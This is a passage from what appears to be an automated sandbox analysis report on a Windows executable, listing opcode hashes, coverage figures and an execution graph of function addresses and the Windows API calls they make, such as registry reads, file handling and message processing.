                                                                                                      • Opcode ID: d7e6505efc2205903551ed6b1b4c246b6c5932a302cd59b511fcd9daec0bffb0
                                                                                                      • Instruction ID: ffbc3e75d7c9aa9218588a638e1cb9cb95cc7ef1b2ad08a00c7a0354a40b961c
                                                                                                      • Opcode Fuzzy Hash: d7e6505efc2205903551ed6b1b4c246b6c5932a302cd59b511fcd9daec0bffb0
                                                                                                      • Instruction Fuzzy Hash: 88418C71D00289AFCF15CF95CD89AEE7BB6FF08310F154169F90567222D3799A50EB50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.7%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:2.1%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:91
                                                                                                      execution_graph 112414 d11033 112419 d16686 112414->112419 112418 d11042 112420 d1bf07 8 API calls 112419->112420 112421 d166f4 112420->112421 112427 d155cc 112421->112427 112423 d16791 112425 d11038 112423->112425 112430 d168e6 8 API calls __fread_nolock 112423->112430 112426 d30433 29 API calls __onexit 112425->112426 112426->112418 112431 d155f8 112427->112431 112430->112423 112432 d155eb 112431->112432 112433 d15605 112431->112433 112432->112423 112433->112432 112434 d1560c RegOpenKeyExW 112433->112434 112434->112432 112435 d15626 RegQueryValueExW 112434->112435 112436 d15647 112435->112436 112437 d1565c RegCloseKey 112435->112437 112436->112437 112437->112432 112438 d655f4 112447 d2e34f 112438->112447 112440 d6560a 112446 d65685 112440->112446 112456 d2a9e5 9 API calls 112440->112456 112443 d6617b 112444 d65665 112444->112446 112457 d82393 8 API calls 112444->112457 112446->112443 112458 d83ef6 81 API calls __wsopen_s 112446->112458 112448 d2e370 112447->112448 112449 d2e35d 112447->112449 112451 d2e3a3 112448->112451 112452 d2e375 112448->112452 112459 d1b3fe 8 API calls 112449->112459 112460 d1b3fe 8 API calls 112451->112460 112453 d3016b 8 API calls 112452->112453 112455 d2e367 112453->112455 112455->112440 112456->112444 112457->112446 112458->112443 112459->112455 112460->112455 112461 d64ff4 112465 d81994 112461->112465 112463 d64fff 112464 d81994 52 API calls 112463->112464 112464->112463 112466 d819ce 112465->112466 112472 d819a1 112465->112472 112466->112463 112467 d819d0 112477 d2fd7f 52 API calls 112467->112477 112469 d819d5 112470 d18e70 52 API calls 112469->112470 112471 d819dc 112470->112471 112473 d17af4 8 API calls 112471->112473 112472->112466 112472->112467 112472->112469 112474 d819c8 112472->112474 112473->112466 112476 d1c4c0 39 API calls 112474->112476 112476->112466 112477->112469 112478 d2f9b1 112479 d2f9bb 112478->112479 112484 d2f9dc 112478->112484 112487 d1c34b 112479->112487 112481 d2f9cb 112483 d1c34b 8 API calls 112481->112483 112485 d2f9db 112483->112485 112486 d6fadc 112484->112486 112495 d755d9 8 API calls ISource 112484->112495 112488 d1c381 ISource 112487->112488 112489 d1c359 112487->112489 112488->112481 112490 d1c367 112489->112490 112491 d1c34b 8 API calls 112489->112491 112492 d1c36d 112490->112492 112493 d1c34b 8 API calls 112490->112493 112491->112490 112492->112488 112494 d1c780 8 API calls 112492->112494 112493->112492 112494->112488 112495->112484 110351 d1f595 110354 d1ca50 110351->110354 110355 d1ca6b 110354->110355 110356 d61461 110355->110356 110357 d614af 110355->110357 110380 d1ca90 110355->110380 110360 d6146b 110356->110360 110363 d61478 110356->110363 110356->110380 110408 d961ff 110357->110408 110455 d96690 180 API calls 110360->110455 110381 d1cd60 110363->110381 110456 d96b2d 180 API calls 2 library calls 110363->110456 110366 d1cf30 39 API calls 110366->110380 110367 d61742 110367->110367 110370 d2e781 39 API calls 110370->110380 110371 d1cd8e 110373 d6168b 110463 d96569 81 API calls 110373->110463 110380->110366 110380->110370 110380->110371 110380->110373 110380->110381 110385 d202f0 110380->110385 110431 d1bdc1 110380->110431 110435 d2e73b 110380->110435 110441 d2aa19 180 API calls 110380->110441 110442 d305d2 EnterCriticalSection 110380->110442 110447 d2bbd2 8 API calls 110380->110447 110448 d30433 29 API calls __onexit 110380->110448 110449 d30588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 110380->110449 110450 d2f4ed 110380->110450 110454 d2f354 180 API calls 110380->110454 110457 d1b3fe 8 API calls 110380->110457 110458 d6ff4f 8 API calls 110380->110458 110459 d1be6d 110380->110459 110381->110371 110464 d83ef6 81 API calls __wsopen_s 110381->110464 110387 d20326 ISource 110385->110387 110386 d3016b 8 API calls 110386->110387 110387->110386 110388 d662cf 110387->110388 110389 d21645 110387->110389 110390 d2044d ISource 110387->110390 110393 d65c7f 110387->110393 110394 d661fe 110387->110394 110395 d1be6d 8 API calls 110387->110395 110399 d305d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 110387->110399 110402 d1bf07 8 API calls 110387->110402 110403 d30433 29 API calls pre_c_initialization 110387->110403 110404 d660b9 110387->110404 110405 d20a5e ISource 110387->110405 110406 d30588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 110387->110406 110465 d21e00 110387->110465 110475 d21940 180 API calls 2 library calls 110387->110475 110479 d83ef6 81 API calls __wsopen_s 110388->110479 110389->110390 110396 d1be6d 8 API calls 110389->110396 110390->110380 110393->110390 110401 d1be6d 8 API calls 110393->110401 110478 d83ef6 81 API calls __wsopen_s 110394->110478 110395->110387 110396->110390 110399->110387 110401->110390 110402->110387 110403->110387 110476 d83ef6 81 API calls __wsopen_s 110404->110476 110477 d83ef6 81 API calls __wsopen_s 110405->110477 110406->110387 110409 d96228 110408->110409 110410 d9623e 110408->110410 110409->110410 110411 d9622d 110409->110411 110413 d305d2 5 API calls 110410->110413 110429 d96292 110410->110429 110512 d96690 180 API calls 110411->110512 110415 d96263 110413->110415 110414 d96239 110414->110380 110415->110429 110513 d2bbd2 8 API calls 110415->110513 110416 d2e73b 39 API calls 110416->110429 110418 d9627c 110514 d30433 29 API calls __onexit 110418->110514 110419 d96405 110519 d83ef6 81 API calls __wsopen_s 110419->110519 110422 d1bdc1 39 API calls 110422->110429 110423 d96286 110515 d30588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 110423->110515 110426 d2f4ed 81 API calls 110426->110429 110428 d202f0 180 API calls 110428->110429 110429->110414 110429->110416 110429->110419 110429->110422 110429->110426 110429->110428 110516 d2aa19 180 API calls 110429->110516 110517 d96569 81 API calls 110429->110517 110518 d2f354 180 API calls 110429->110518 110432 d1bdcc 110431->110432 110433 d1bdfb 110432->110433 110520 d1bf39 110432->110520 110433->110380 110436 d2e747 110435->110436 110439 d2e774 110435->110439 110437 d2e76c 110436->110437 110566 d2e781 39 API calls 110436->110566 110437->110380 110439->110436 110567 d2e781 39 API calls 110439->110567 110441->110380 110443 d305e6 110442->110443 110444 d305eb LeaveCriticalSection 110443->110444 110568 d30666 LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 110443->110568 110444->110380 110447->110380 110448->110380 110449->110380 110451 d2f50a 110450->110451 110453 d2f552 110450->110453 110451->110453 110569 d83ef6 81 API calls __wsopen_s 110451->110569 110453->110380 110454->110380 110455->110363 110456->110381 110457->110380 110458->110380 110460 d1be90 __fread_nolock 110459->110460 110461 d1be81 110459->110461 110460->110380 110461->110460 110462 d3019b 8 API calls 110461->110462 110462->110460 110463->110381 110464->110367 110471 d21e1d ISource 110465->110471 110466 d224c2 110468 d21fa7 ISource 110466->110468 110487 d2bd82 39 API calls 110466->110487 110468->110387 110470 d677db 110470->110468 110486 d3d2f5 39 API calls 110470->110486 110471->110466 110471->110468 110471->110470 110474 d6760f 110471->110474 110481 d2e29c 110471->110481 110480 d3d2f5 39 API calls 110474->110480 110475->110387 110476->110405 110477->110390 110478->110390 110479->110390 110480->110474 110482 d2e2a4 110481->110482 110483 d2e2c8 110482->110483 110488 d1c700 110482->110488 110483->110471 110485 d2e2af ISource 110485->110471 110486->110468 110487->110468 110489 d1c70b 110488->110489 110490 d61228 110489->110490 110495 d1c713 ISource 110489->110495 110500 d3016b 110490->110500 110491 d1c71a 110491->110485 110493 d61234 110495->110491 110496 d1c780 110495->110496 110498 d1c78b ISource 110496->110498 110497 d1c7c6 ISource 110497->110495 110498->110497 110499 d2e29c 8 API calls 110498->110499 110499->110497 110501 d30170 ___std_exception_copy 110500->110501 110502 d3018a 110501->110502 110505 d3018c 110501->110505 110509 d3523d 7 API calls 2 library calls 110501->110509 110502->110493 110504 d309fd 110511 d33634 RaiseException 110504->110511 110505->110504 110510 d33634 RaiseException 110505->110510 110508 d30a1a 110508->110493 110509->110501 110510->110504 110511->110508 110512->110414 110513->110418 110514->110423 110515->110429 110516->110429 110517->110429 110518->110429 110519->110414 110537 d1cf30 110520->110537 110522 d1bf49 110523 d1bf57 110522->110523 110524 d60d59 110522->110524 110525 d3016b 8 API calls 110523->110525 110551 d1b3fe 8 API calls 110524->110551 110528 d1bf68 110525->110528 110527 d60d64 110545 d1bf07 110528->110545 110531 d1bf81 110533 d3016b 8 API calls 110531->110533 110532 d1be6d 8 API calls 110532->110531 110534 d1bf8b 110533->110534 110550 d1be0f 39 API calls 110534->110550 110536 d1bfaf 110536->110433 110538 d1d177 110537->110538 110542 d1cf43 110537->110542 110538->110522 110539 d305d2 5 API calls 110539->110542 110540 d1bf07 8 API calls 110540->110542 110541 d1cfed 110541->110522 110542->110539 110542->110540 110542->110541 110552 d30433 29 API calls __onexit 110542->110552 110553 d30588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 110542->110553 110554 d3019b 110545->110554 110547 d1bf1c 110548 d3016b 8 API calls 110547->110548 110549 d1bf2a 110548->110549 110549->110531 110549->110532 110550->110536 110551->110527 110552->110542 110553->110542 110555 d3016b ___std_exception_copy 110554->110555 110556 d3018a 110555->110556 110558 d3018c 110555->110558 110563 d3523d 7 API calls 2 library calls 110555->110563 110556->110547 110559 d309fd 110558->110559 110564 d33634 RaiseException 110558->110564 110565 d33634 RaiseException 110559->110565 110562 d30a1a 110562->110547 110563->110555 110564->110559 110565->110562 110566->110437 110567->110436 110568->110443 110569->110453 112496 d21876 112497 d3016b 8 API calls 112496->112497 112498 d2187d 112497->112498 112499 d63fb3 112515 d1ee60 ISource 112499->112515 112500 d1f1c1 PeekMessageW 112500->112515 112501 d1f085 112502 d1eeb7 GetInputState 112502->112500 112502->112515 112504 d63271 TranslateAcceleratorW 112504->112515 112505 d1f0b4 timeGetTime 112505->112515 112506 d1f223 TranslateMessage DispatchMessageW 112507 d1f23f PeekMessageW 112506->112507 112507->112515 112508 d1f25f Sleep 112524 d1f270 112508->112524 112509 d64127 Sleep 112509->112524 112510 d6338d timeGetTime 112623 d2a9e5 9 API calls 112510->112623 112511 d2f27e timeGetTime 112511->112524 112514 d641be GetExitCodeProcess 112517 d641d4 WaitForSingleObject 112514->112517 112518 d641ea CloseHandle 112514->112518 112515->112500 112515->112501 112515->112502 112515->112504 112515->112505 112515->112506 112515->112507 112515->112508 112515->112509 112515->112510 112528 d202f0 180 API calls 112515->112528 112531 d1f400 112515->112531 112539 d1f680 112515->112539 112562 d22ad0 112515->112562 112618 d2f2a5 112515->112618 112624 d84384 8 API calls 112515->112624 112625 d83ef6 81 API calls __wsopen_s 112515->112625 112516 d63cf5 112521 d63cfd 112516->112521 112517->112515 112517->112518 112518->112524 112519 da331e GetForegroundWindow 112519->112524 112522 d6425c Sleep 112522->112515 112524->112511 112524->112514 112524->112515 112524->112516 112524->112519 112524->112522 112626 d95fb5 8 API calls 112524->112626 112627 d7f1a7 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 112524->112627 112628 d7dc9c 46 API calls 112524->112628 112528->112515 112532 d1f411 112531->112532 112533 d1f433 112532->112533 112534 d1f41f 112532->112534 112662 d83ef6 81 API calls __wsopen_s 112533->112662 112629 d1e910 112534->112629 112536 d1f42a 112536->112515 112538 d64528 112538->112538 112540 d1f6c0 112539->112540 112542 d305d2 5 API calls 112540->112542 112555 d1f78c ISource 112540->112555 112541 d305d2 5 API calls 112541->112555 112543 d6457d 112542->112543 112545 d1bf07 8 API calls 112543->112545 112543->112555 112544 d1bf07 8 API calls 112544->112555 112547 d64597 112545->112547 112679 d30433 29 API calls __onexit 112547->112679 112548 d1bdc1 39 API calls 112548->112555 112550 d645a1 112680 d30588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 112550->112680 112553 d202f0 180 API calls 112553->112555 112555->112541 112555->112544 112555->112548 112555->112553 112556 d1be6d 8 API calls 112555->112556 112557 d21c50 8 API calls 112555->112557 112558 d1fa91 112555->112558 112561 d83ef6 81 API calls 112555->112561 112678 d2b2d6 180 API calls 112555->112678 112681 d30433 29 API calls __onexit 112555->112681 112682 d30588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 112555->112682 112683 d95131 101 API calls 112555->112683 112684 d9721e 180 API calls 112555->112684 112556->112555 112557->112555 112558->112515 112561->112555 112563 d22f70 112562->112563 112564 d22b36 112562->112564 112565 d305d2 5 API calls 112563->112565 112566 d22b50 112564->112566 112567 d67b7c 112564->112567 112569 d22f7a 112565->112569 112570 d230e0 9 API calls 112566->112570 112715 d979f9 180 API calls 112567->112715 112572 d22fbb 112569->112572 112575 d1b25f 8 API calls 112569->112575 112573 d22b60 112570->112573 112571 d67b88 112571->112515 112578 d67b91 112572->112578 112579 d22fec 112572->112579 112574 d230e0 9 API calls 112573->112574 112576 d22b76 112574->112576 112583 d22f94 112575->112583 112576->112572 112577 d22bac 112576->112577 112577->112578 112602 d22bc8 __fread_nolock 112577->112602 112716 d83ef6 81 API calls __wsopen_s 112578->112716 112712 d1b3fe 8 API calls 112579->112712 112582 d22ff9 112713 d2e662 180 API calls 112582->112713 112711 d30588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 112583->112711 112585 d67bb9 112717 d83ef6 81 API calls __wsopen_s 112585->112717 112588 d22cef 112589 d67c1c 112588->112589 112590 d22cfc 112588->112590 112719 d960a2 53 API calls _wcslen 112589->112719 112591 d230e0 9 API calls 112590->112591 112593 d22d09 112591->112593 112597 d67d45 112593->112597 112599 d230e0 9 API calls 112593->112599 112594 d3016b 8 API calls 112594->112602 112595 d23032 112714 d2fe59 8 API calls 112595->112714 112596 d3019b 8 API calls 112596->112602 112606 d67bb4 112597->112606 112720 d83ef6 81 API calls __wsopen_s 112597->112720 112604 d22d23 112599->112604 112601 d202f0 180 API calls 112601->112602 112602->112582 112602->112585 112602->112588 112602->112594 112602->112596 112602->112601 112603 d67bfd 112602->112603 112602->112606 112718 d83ef6 81 API calls __wsopen_s 112603->112718 112604->112597 112607 d1be6d 8 API calls 112604->112607 112609 d22d87 ISource 112604->112609 112606->112515 112607->112609 112608 d230e0 9 API calls 112608->112609 112609->112595 112609->112597 112609->112606 112609->112608 112612 d22e3b ISource 112609->112612 112685 d8276a 112609->112685 112689 d9a8ae 112609->112689 112697 d99eea 112609->112697 112700 d9a4b4 112609->112700 112706 d865b4 112609->112706 112610 d22edd 112610->112515 112611 d2e29c 8 API calls 112611->112612 112612->112610 112612->112611 112619 d2f2b8 112618->112619 112620 d2f2c1 112618->112620 112619->112515 112620->112619 112621 d2f2e5 IsDialogMessageW 112620->112621 112622 d6f83b GetClassLongW 112620->112622 112621->112619 112621->112620 112622->112620 112622->112621 112623->112515 112624->112515 112625->112515 112626->112524 112627->112524 112628->112524 112630 d1e92b 112629->112630 112631 d202f0 180 API calls 112630->112631 112634 d1e94d 112631->112634 112632 d63176 112676 d83ef6 81 API calls __wsopen_s 112632->112676 112634->112632 112635 d1e9bb ISource 112634->112635 112636 d1ed85 112634->112636 112637 d1ea73 112634->112637 112640 d1eb68 112634->112640 112650 d3016b 8 API calls 112634->112650 112657 d1ead9 ISource __fread_nolock 112634->112657 112635->112536 112636->112635 112646 d3019b 8 API calls 112636->112646 112637->112636 112639 d1ea7e 112637->112639 112638 d1ecaf 112642 d63167 112638->112642 112643 d1ecc4 112638->112643 112641 d3016b 8 API calls 112639->112641 112647 d3019b 8 API calls 112640->112647 112649 d1ea85 __fread_nolock 112641->112649 112675 d96062 8 API calls 112642->112675 112645 d3016b 8 API calls 112643->112645 112655 d1eb1a 112645->112655 112646->112649 112647->112657 112648 d3016b 8 API calls 112651 d1eaa6 112648->112651 112649->112648 112649->112651 112650->112634 112651->112657 112663 d1d210 112651->112663 112653 d63156 112674 d83ef6 81 API calls __wsopen_s 112653->112674 112655->112536 112657->112638 112657->112653 112657->112655 112658 d63131 112657->112658 112660 d6310f 112657->112660 112671 d14485 180 API calls 112657->112671 112673 d83ef6 81 API calls __wsopen_s 112658->112673 112672 d83ef6 81 API calls __wsopen_s 112660->112672 112662->112538 112664 d1d276 112663->112664 112665 d1d24a 112663->112665 112667 d202f0 180 API calls 112664->112667 112666 d1f680 180 API calls 112665->112666 112669 d1d250 112665->112669 112666->112669 112668 d617ee 112667->112668 112668->112669 112677 d83ef6 81 API calls __wsopen_s 112668->112677 112669->112657 112671->112657 112672->112655 112673->112655 112674->112655 112675->112632 112676->112635 112677->112669 112678->112555 112679->112550 112680->112555 112681->112555 112682->112555 112683->112555 112684->112555 112686 d82773 112685->112686 112688 d82778 112685->112688 112721 d8183b 112686->112721 112688->112609 112690 d9a8ca 112689->112690 112692 d9a90a 112689->112692 112690->112609 112691 d9a928 112691->112690 112695 d9a990 112691->112695 112775 d1c92d 39 API calls 112691->112775 112692->112691 112774 d1c92d 39 API calls 112692->112774 112742 d80287 112695->112742 112800 d988b6 112697->112800 112699 d99efa 112699->112609 112702 d9a4c7 112700->112702 112701 d18e70 52 API calls 112703 d9a534 112701->112703 112702->112701 112704 d9a4d6 112702->112704 112890 d817be 112703->112890 112704->112609 112707 d18e70 52 API calls 112706->112707 112708 d865c7 112707->112708 112931 d7e387 lstrlenW 112708->112931 112710 d865d1 112710->112609 112711->112572 112712->112582 112713->112595 112714->112595 112715->112571 112716->112606 112717->112606 112718->112606 112719->112604 112720->112606 112722 d81852 112721->112722 112737 d8196b 112721->112737 112723 d8189f 112722->112723 112724 d81872 112722->112724 112726 d818b6 112722->112726 112725 d3019b 8 API calls 112723->112725 112724->112723 112728 d81886 112724->112728 112739 d81894 __fread_nolock 112725->112739 112729 d3019b 8 API calls 112726->112729 112735 d818d3 112726->112735 112727 d818fa 112731 d3019b 8 API calls 112727->112731 112730 d3019b 8 API calls 112728->112730 112729->112735 112730->112739 112732 d81900 112731->112732 112740 d2c1f1 8 API calls 112732->112740 112733 d3016b 8 API calls 112733->112737 112735->112727 112735->112728 112735->112739 112736 d8190c 112741 d2f9e2 10 API calls 112736->112741 112737->112688 112739->112733 112740->112736 112741->112739 112776 d801bf 112742->112776 112745 d80308 112792 d804fe 56 API calls __fread_nolock 112745->112792 112746 d80320 112748 d80386 112746->112748 112751 d80330 112746->112751 112749 d8041c 112748->112749 112750 d803b6 112748->112750 112767 d802ae __fread_nolock 112748->112767 112754 d804c5 112749->112754 112755 d80425 112749->112755 112752 d803bb 112750->112752 112753 d803e6 112750->112753 112758 d8276a 10 API calls 112751->112758 112759 d80368 112751->112759 112752->112767 112793 d1c9fb 39 API calls 112752->112793 112753->112767 112794 d1c9fb 39 API calls 112753->112794 112754->112767 112798 d1c5df 39 API calls 112754->112798 112756 d8042a 112755->112756 112757 d804a2 112755->112757 112760 d80469 112756->112760 112761 d80430 112756->112761 112757->112767 112797 d1c5df 39 API calls 112757->112797 112770 d8033c 112758->112770 112783 d81759 112759->112783 112760->112767 112796 d1c5df 39 API calls 112760->112796 112761->112767 112795 d1c5df 39 API calls 112761->112795 112767->112690 112771 d8276a 10 API calls 112770->112771 112772 d80353 __fread_nolock 112771->112772 112773 d8276a 10 API calls 112772->112773 112773->112759 112774->112691 112775->112695 112777 d8020c 112776->112777 112781 d801d0 112776->112781 112799 d1c92d 39 API calls 112777->112799 112779 d18e70 52 API calls 112779->112781 112780 d34db8 _strftime 40 API calls 112780->112781 112781->112779 112781->112780 112782 d8020a 112781->112782 112782->112745 112782->112746 112782->112767 112784 d81764 112783->112784 112785 d3016b 8 API calls 112784->112785 112786 d8176b 112785->112786 112787 d81798 112786->112787 112788 d81777 112786->112788 112790 d3019b 8 API calls 112787->112790 112789 d3019b 8 API calls 112788->112789 112791 d81780 ___scrt_fastfail 112789->112791 112790->112791 112791->112767 112792->112767 112793->112767 112794->112767 112795->112767 112796->112767 112797->112767 112798->112767 112799->112782 112801 d18e70 52 API calls 112800->112801 112802 d988ed 112801->112802 112824 d98932 ISource 112802->112824 112838 d99632 112802->112838 112804 d98bde 112805 d98dac 112804->112805 112809 d98bec 112804->112809 112876 d99843 59 API calls 112805->112876 112808 d98dbb 112808->112809 112810 d98dc7 112808->112810 112851 d987e3 112809->112851 112810->112824 112811 d18e70 52 API calls 112828 d989a6 112811->112828 112816 d98c25 112865 d30000 112816->112865 112819 d98c5f 112822 d17d51 8 API calls 112819->112822 112820 d98c45 112871 d83ef6 81 API calls __wsopen_s 112820->112871 112825 d98c6e 112822->112825 112823 d98c50 GetCurrentProcess TerminateProcess 112823->112819 112824->112699 112826 d183b0 8 API calls 112825->112826 112827 d98c87 112826->112827 112836 d98caf 112827->112836 112872 d21c50 8 API calls 112827->112872 112828->112804 112828->112811 112828->112824 112869 d74a0c 8 API calls __fread_nolock 112828->112869 112870 d98e7c 41 API calls _strftime 112828->112870 112830 d98e22 112830->112824 112832 d98e36 FreeLibrary 112830->112832 112831 d98c9e 112873 d994da 74 API calls 112831->112873 112832->112824 112836->112830 112874 d21c50 8 API calls 112836->112874 112875 d1b3fe 8 API calls 112836->112875 112877 d994da 74 API calls 112836->112877 112839 d1c269 8 API calls 112838->112839 112840 d9964d CharLowerBuffW 112839->112840 112878 d796e3 112840->112878 112844 d1bf07 8 API calls 112845 d99689 112844->112845 112885 d18685 8 API calls __fread_nolock 112845->112885 112847 d9969d 112848 d196d9 8 API calls 112847->112848 112850 d996a7 _wcslen 112848->112850 112849 d997bd _wcslen 112849->112828 112850->112849 112886 d98e7c 41 API calls _strftime 112850->112886 112852 d987fe 112851->112852 112856 d98849 112851->112856 112853 d3019b 8 API calls 112852->112853 112855 d98820 112853->112855 112854 d3016b 8 API calls 112854->112855 112855->112854 112855->112856 112857 d999f5 112856->112857 112858 d99c0a ISource 112857->112858 112863 d99a19 _strcat _wcslen ___std_exception_copy 112857->112863 112858->112816 112859 d1c92d 39 API calls 112859->112863 112860 d1c5df 39 API calls 112860->112863 112861 d1c9fb 39 API calls 112861->112863 112862 d18e70 52 API calls 112862->112863 112863->112858 112863->112859 112863->112860 112863->112861 112863->112862 112889 d7f7da 10 API calls _wcslen 112863->112889 112866 d30015 112865->112866 112867 d300ad WriteProcessMemory 112866->112867 112868 d3007b 112866->112868 112867->112868 112868->112819 112868->112820 112869->112828 112870->112828 112871->112823 112872->112831 112873->112836 112874->112836 112875->112836 112876->112808 112877->112836 112879 d79703 _wcslen 112878->112879 112880 d797f2 112879->112880 112881 d79738 112879->112881 112884 d797f7 112879->112884 112880->112844 112880->112850 112881->112880 112887 d2e2e5 41 API calls 112881->112887 112884->112880 112888 d2e2e5 41 API calls 112884->112888 112885->112847 112886->112849 112887->112881 112888->112884 112889->112863 112891 d817cb 112890->112891 112892 d3016b 8 API calls 112891->112892 112893 d817d2 112892->112893 112896 d7fbca 112893->112896 112895 d8180c 112895->112704 112897 d1c269 8 API calls 112896->112897 112898 d7fbdd CharLowerBuffW 112897->112898 112899 d7fbf0 112898->112899 112900 d7fc2e 112899->112900 112901 d1627c 8 API calls 112899->112901 112913 d7fbfa ___scrt_fastfail 112899->112913 112902 d7fc40 112900->112902 112903 d1627c 8 API calls 112900->112903 112901->112899 112904 d3019b 8 API calls 112902->112904 112903->112902 112907 d7fc6e 112904->112907 112909 d7fc90 112907->112909 112929 d7fb02 8 API calls 112907->112929 112908 d7fccd 112910 d3016b 8 API calls 112908->112910 112908->112913 112914 d7fd21 112909->112914 112911 d7fce7 112910->112911 112912 d3019b 8 API calls 112911->112912 112912->112913 112913->112895 112915 d1bf07 8 API calls 112914->112915 112916 d7fd53 112915->112916 112917 d1bf07 8 API calls 112916->112917 112918 d7fd5c 112917->112918 112919 d1bf07 8 API calls 112918->112919 112924 d7fd65 112919->112924 112920 d184b7 8 API calls 112920->112924 112921 d80029 112921->112908 112922 d1acc0 8 API calls 112922->112924 112923 d36718 GetStringTypeW 112923->112924 112924->112920 112924->112921 112924->112922 112924->112923 112926 d7fd21 40 API calls 112924->112926 112927 d36661 39 API calls 112924->112927 112928 d1be6d 8 API calls 112924->112928 112930 d36742 GetStringTypeW _strftime 112924->112930 112926->112924 112927->112924 112928->112924 112929->112907 112930->112924 112932 d7e3a5 GetFileAttributesW 112931->112932 112933 d7e3cf 112931->112933 112932->112933 112934 d7e3b1 FindFirstFileW 112932->112934 112933->112710 112934->112933 112935 d7e3c2 FindClose 112934->112935 112935->112933 110570 d48792 110575 d4854e 110570->110575 110573 d487ba 110576 d4857f try_get_first_available_module 110575->110576 110583 d486c8 110576->110583 110590 d3919b 40 API calls 2 library calls 110576->110590 110578 d4877e 110594 d42b7c 26 API calls _abort 110578->110594 110580 d486d3 110580->110573 110587 d50d24 110580->110587 110582 d4871c 110582->110583 110591 d3919b 40 API calls 2 library calls 110582->110591 110583->110580 110593 d3f669 20 API calls _abort 110583->110593 110585 d4873b 110585->110583 110592 d3919b 40 API calls 2 library calls 110585->110592 110595 d50421 110587->110595 110589 d50d3f 110589->110573 110590->110582 110591->110585 110592->110583 110593->110578 110594->110580 110598 d5042d ___BuildCatchObject 110595->110598 110596 d5043b 110652 d3f669 20 API calls _abort 110596->110652 110598->110596 110600 d50474 110598->110600 110599 d50440 110653 d42b7c 26 API calls _abort 110599->110653 110606 d509fb 110600->110606 110605 d5044a __wsopen_s 110605->110589 110607 d50a18 110606->110607 110608 d50a46 110607->110608 110609 d50a2d 110607->110609 110655 d455b1 110608->110655 110669 d3f656 20 API calls _abort 110609->110669 110612 d50a32 110670 d3f669 20 API calls _abort 110612->110670 110613 d50a4b 110614 d50a54 110613->110614 110615 d50a6b 110613->110615 110671 d3f656 20 API calls _abort 110614->110671 110668 d5073a CreateFileW 110615->110668 110619 d50a59 110672 d3f669 20 API calls _abort 110619->110672 110621 d50b21 GetFileType 110623 d50b73 110621->110623 110624 d50b2c GetLastError 110621->110624 110622 d50af6 GetLastError 110674 d3f633 20 API calls 2 library calls 110622->110674 110677 d454fa 21 API calls 3 library calls 110623->110677 110675 d3f633 20 API calls 2 library calls 110624->110675 110625 d50aa4 110625->110621 110625->110622 110673 d5073a CreateFileW 110625->110673 110628 d50b3a CloseHandle 110628->110612 110630 d50b63 110628->110630 110676 d3f669 20 API calls _abort 110630->110676 110632 d50ae9 110632->110621 110632->110622 110634 d50b94 110636 d50be0 110634->110636 110678 d5094b 72 API calls 4 library calls 110634->110678 110635 d50b68 110635->110612 110640 d50c0d 110636->110640 110679 d504ed 72 API calls 4 library calls 110636->110679 110639 d50c06 110639->110640 110641 d50c1e 110639->110641 110680 d48a3e 110640->110680 110643 d50498 110641->110643 110644 d50c9c CloseHandle 110641->110644 110654 d504c1 LeaveCriticalSection __wsopen_s 110643->110654 110695 d5073a CreateFileW 110644->110695 110646 d50cc7 110647 d50cd1 GetLastError 110646->110647 110648 d50cfd 110646->110648 110696 d3f633 20 API calls 2 library calls 110647->110696 110648->110643 110650 d50cdd 110697 d456c3 21 API calls 3 library calls 110650->110697 110652->110599 110653->110605 110654->110605 110656 d455bd ___BuildCatchObject 110655->110656 110698 d432ee EnterCriticalSection 110656->110698 110658 d455c4 110659 d455e9 110658->110659 110663 d45657 EnterCriticalSection 110658->110663 110666 d4560b 110658->110666 110702 d45390 21 API calls 3 library calls 110659->110702 110662 d45634 __wsopen_s 110662->110613 110665 d45664 LeaveCriticalSection 110663->110665 110663->110666 110664 d455ee 110664->110666 110703 d454d7 EnterCriticalSection 110664->110703 110665->110658 110699 d456ba 110666->110699 110668->110625 110669->110612 110670->110643 110671->110619 110672->110612 110673->110632 110674->110612 110675->110628 110676->110635 110677->110634 110678->110636 110679->110639 110705 d45754 110680->110705 110682 d48a54 110718 d456c3 21 API calls 3 library calls 110682->110718 110684 d48a4e 110684->110682 110685 d48a86 110684->110685 110686 d45754 __wsopen_s 26 API calls 110684->110686 110685->110682 110687 d45754 __wsopen_s 26 API calls 110685->110687 110689 d48a7d 110686->110689 110690 d48a92 FindCloseChangeNotification 110687->110690 110688 d48aac 110691 d48ace 110688->110691 110719 d3f633 20 API calls 2 library calls 110688->110719 110692 d45754 __wsopen_s 26 API calls 110689->110692 110690->110682 110693 d48a9e GetLastError 110690->110693 110691->110643 110692->110685 110693->110682 110695->110646 110696->110650 110697->110648 110698->110658 110704 d43336 LeaveCriticalSection 110699->110704 110701 d456c1 110701->110662 110702->110664 110703->110666 110704->110701 110706 d45776 110705->110706 110707 d45761 110705->110707 110711 d4579b 110706->110711 110722 d3f656 20 API calls _abort 110706->110722 110720 d3f656 20 API calls _abort 110707->110720 110710 d45766 110721 d3f669 20 API calls _abort 110710->110721 110711->110684 110712 d457a6 110723 d3f669 20 API calls _abort 110712->110723 110715 d4576e 110715->110684 110716 d457ae 110724 d42b7c 26 API calls _abort 110716->110724 110718->110688 110719->110691 110720->110710 110721->110715 110722->110712 110723->110716 110724->110715 110725 d11098 110730 d15d78 110725->110730 110729 d110a7 110731 d1bf07 8 API calls 110730->110731 110732 d15d8f GetVersionExW 110731->110732 110751 d184b7 110732->110751 110734 d15ddc 110745 d15e12 110734->110745 110763 d196d9 110734->110763 110736 d15e06 110767 d179ed 110736->110767 110737 d15ecc GetCurrentProcess IsWow64Process 110739 d15ee8 110737->110739 110740 d15f00 LoadLibraryA 110739->110740 110741 d550f2 